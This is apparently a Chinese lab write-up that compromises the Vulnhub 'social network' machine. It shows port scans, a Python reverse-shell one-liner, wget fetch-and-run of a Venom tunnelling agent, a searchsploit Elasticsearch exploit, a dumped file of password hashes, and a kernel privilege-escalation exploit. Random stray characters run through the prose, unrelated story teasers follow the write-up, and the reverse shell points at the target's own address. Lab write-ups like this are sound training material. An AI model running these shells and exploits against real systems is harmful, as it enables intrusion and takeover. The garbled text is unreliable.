No.1:vulhub blog-social-network

靶機信息

https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

主機褐耳、端口叨襟、服務(wù)

  • 主機發(fā)現(xiàn) arp-scan -l
  • nmap -sP 192.168.0.1/24
  • 端口發(fā)現(xiàn) - nmap -p- 192.168.0.102
  • 服務(wù)發(fā)現(xiàn)nmap -p22,5000 -sV 192.168.0.102
服務(wù)發(fā)現(xiàn)

目標(biāo)主機開啟了5000端口,服務(wù)為werkzeug怠噪。

目標(biāo)網(wǎng)站滲透

  • 瀏覽器打開http://192.168.0.102:5000
  • 使用掃描工具先進行路徑掃描马篮,發(fā)現(xiàn)存在/admin目錄


    image.png
  • http://192.168.0.102:5000/admin 目錄中存在代碼執(zhí)行漏洞晤柄,目標(biāo)系統(tǒng)為python,可能為python代碼亿昏,需要用到python反彈shell
  • nc監(jiān)聽端口 nc -nvlp 4444
  • 反彈shell 峦剔,拿到權(quán)限
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.102",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
image.png

判斷目標(biāo)服務(wù)器是否為docker

內(nèi)網(wǎng)掃描

/app # for i in $(seq 1 10); do ping -c 1 172.17.0.$i;done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.036 ms

--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.036/0.036/0.036 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms

--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.124 ms

--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.124/0.124/0.124 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes

內(nèi)網(wǎng)滲透

  • 基本原理:使用代理工具,建立kali與內(nèi)網(wǎng)機器的一條隧道角钩,將kali與內(nèi)網(wǎng)機器打通吝沫,kali中的工具可以通過該隧道進行工作呻澜。
  • Vemon基本步驟:
  1. 將agent拷貝到目標(biāo)主機;使用 python3 -m http.server 80 在主機建立http服務(wù)惨险;
  2. 在目標(biāo)內(nèi)網(wǎng)服務(wù)器中使用wget http://192.168.0.103/a下載agent羹幸,可執(zhí)行權(quán)限chmod +x a
  3. 開啟vemon服務(wù)端 ./admin_linux_x64 -lport 9999
  4. 開啟vemon客戶端 ./a -rhost 192.168.0.103 -rport 9999
  5. venom:
┌──(kali?kali)-[~/Desktop/tmp/Venom v1.1.0]
└─$ ./admin_linux_x64 -lport 9999
Venom Admin Node Start...

  ____   ____  { v1.1  author: Dlive }
  \   \ /   /____   ____   ____   _____
   \   Y   // __ \ /    \ /    \ /     \
    \     /\  ___/|   |  (  <_> )  Y Y  \
     \___/  \___  >___|  /\____/|__|_|  /
                \/     \/             \/
 
(admin node) >>> 
[+]Remote connection:  192.168.0.101:55035
[+]A new node connect to admin node success
(admin node) >>> show 
A
+ -- 1
(admin node) >>> goto 1
node 1
(node 1) >>> socks 1080
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>> 
  1. 配置proxychain
    sudo vi /etc/proxychains4.conf
    socks5 127.0.0.1 1080

  2. 使用nmap工具掃描內(nèi)網(wǎng)地址
    proxychain4 nmap -Pn 172.17.0.1
    proxychain4 nmap -p22,5000 -sV 172.17.0.1
    發(fā)現(xiàn) 172.17.0.1是192.168.0.102的內(nèi)網(wǎng)地址

  3. 掃描其他主機
    proxychains4 nmap -p9200 -sV 172.17.0.2
    掃描出開放9200端口,運行es服務(wù)

  4. 使用es滲透腳本辫愉,拿到172.17.0.2的權(quán)限

┌──(kali?kali)-[~]
└─$ searchsploit Elasticsearch
----------------------- ---------------------------------
 Exploit Title         |  Path
----------------------- ---------------------------------
ElasticSearch - Remote | linux/remote/36337.py
ElasticSearch - Remote | multiple/webapps/33370.html
ElasticSearch - Search | java/remote/36415.rb
ElasticSearch 1.6.0 -  | linux/webapps/38383.py
ElasticSearch < 1.4.5  | php/webapps/37054.py
ElasticSearch Dynamic  | java/remote/33588.rb
----------------------- ---------------------------------
Shellcodes: No Results

cp /usr/share/exploitdb/exploits/php/webapps/36337.py .
proxychains4 python 36337.py 172.17.0.2  
  1. 檢查服務(wù)器文件栅受,有一個passwords文件
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814  1337hack
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
  1. 登錄目標(biāo)服務(wù)器192.168.0.102,john賬號是用戶恭朗,非root屏镊,考慮通過內(nèi)核漏洞提權(quán)。

內(nèi)核提權(quán)

  • 檢查內(nèi)核信息:
uname -a  
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
  • 檢查linux 3.13內(nèi)核漏洞:searchsploit 3.13
  • 檢查漏洞利用腳本37292.c痰腮,其中有涉及到gcc二次編譯的內(nèi)容而芥,刪除gcc命令相關(guān)的代碼,將涉及編譯的ofs-lib.so文件直接拷貝到同級目錄中诽嘉;
  • 編譯修改好的漏洞腳本
  • 通過wget將編譯好的腳本及ofs-lib.so文件直接上傳到靶機蔚出,即可拿到root權(quán)限。


    靶機上操作

知識點總結(jié):

  1. 主機虫腋、端口骄酗、服務(wù)掃描
  2. web目錄掃描
  3. python反彈shell
  4. 內(nèi)網(wǎng)掃描、內(nèi)網(wǎng)穿透
  5. 內(nèi)核提權(quán)
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末悦冀,一起剝皮案震驚了整個濱河市趋翻,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌盒蟆,老刑警劉巖踏烙,帶你破解...
    沈念sama閱讀 211,639評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異历等,居然都是意外死亡讨惩,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,277評論 3 385
  • 文/潘曉璐 我一進店門寒屯,熙熙樓的掌柜王于貴愁眉苦臉地迎上來荐捻,“玉大人,你說我怎么就攤上這事寡夹〈γ妫” “怎么了?”我有些...
    開封第一講書人閱讀 157,221評論 0 348
  • 文/不壞的土叔 我叫張陵菩掏,是天一觀的道長魂角。 經(jīng)常有香客問我,道長智绸,這世上最難降的妖魔是什么野揪? 我笑而不...
    開封第一講書人閱讀 56,474評論 1 283
  • 正文 為了忘掉前任访忿,我火速辦了婚禮,結(jié)果婚禮上囱挑,老公的妹妹穿的比我還像新娘醉顽。我一直安慰自己,他們只是感情好平挑,可當(dāng)我...
    茶點故事閱讀 65,570評論 6 386
  • 文/花漫 我一把揭開白布游添。 她就那樣靜靜地躺著,像睡著了一般通熄。 火紅的嫁衣襯著肌膚如雪唆涝。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,816評論 1 290
  • 那天唇辨,我揣著相機與錄音廊酣,去河邊找鬼。 笑死赏枚,一個胖子當(dāng)著我的面吹牛亡驰,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播饿幅,決...
    沈念sama閱讀 38,957評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼凡辱,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了栗恩?” 一聲冷哼從身側(cè)響起透乾,我...
    開封第一講書人閱讀 37,718評論 0 266
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎磕秤,沒想到半個月后乳乌,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,176評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡市咆,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,511評論 2 327
  • 正文 我和宋清朗相戀三年汉操,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片蒙兰。...
    茶點故事閱讀 38,646評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡客情,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出癞己,到底是詐尸還是另有隱情,我是刑警寧澤梭伐,帶...
    沈念sama閱讀 34,322評論 4 330
  • 正文 年R本政府宣布痹雅,位于F島的核電站,受9級特大地震影響糊识,放射性物質(zhì)發(fā)生泄漏绩社。R本人自食惡果不足惜摔蓝,卻給世界環(huán)境...
    茶點故事閱讀 39,934評論 3 313
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望愉耙。 院中可真熱鬧贮尉,春花似錦、人聲如沸朴沿。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,755評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽赌渣。三九已至魏铅,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間坚芜,已是汗流浹背览芳。 一陣腳步聲響...
    開封第一講書人閱讀 31,987評論 1 266
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留鸿竖,地道東北人沧竟。 一個月前我還...
    沈念sama閱讀 46,358評論 2 360
  • 正文 我出身青樓,卻偏偏與公主長得像缚忧,于是被迫代替她去往敵國和親悟泵。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,514評論 2 348

推薦閱讀更多精彩內(nèi)容

  • 環(huán)境: kali: ifconfig #得到:192.168.0.115 局域網(wǎng)探測: arp-scan -l ...
    A文凱閱讀 1,428評論 0 1
  • 旨在解決滲透測試中遇到的各種疑難問題### 測試目標(biāo)分類:WEB搔谴,APP魁袜,PC,SERVER等APP:1.利用抓包...
    曾經(jīng)那個少年_閱讀 2,349評論 1 0
  • 靶機說明 目標(biāo)ip:172.16.53.28(window 2003) 本靶機所針對的序列化漏洞系列以及常見安全問...
    孤君蓑笠翁閱讀 3,159評論 0 1
  • 平時不怎么習(xí)慣做記錄敦第,導(dǎo)致很多時候在實際滲透中峰弹,遇到了某些問題的時候,還得去咨詢度娘芜果,谷鍋鞠呈,所以,現(xiàn)在決定好好糾正...
    挖低危的清風(fēng)閱讀 1,095評論 0 0
  • 一右钾、米特尼克的圣誕攻擊 1蚁吝、攻擊背景 在Unix世界中,可以很容易地給予信任舀射。 假設(shè)用戶在機器A和機器B上都有一個...
    Assassin007閱讀 407評論 0 0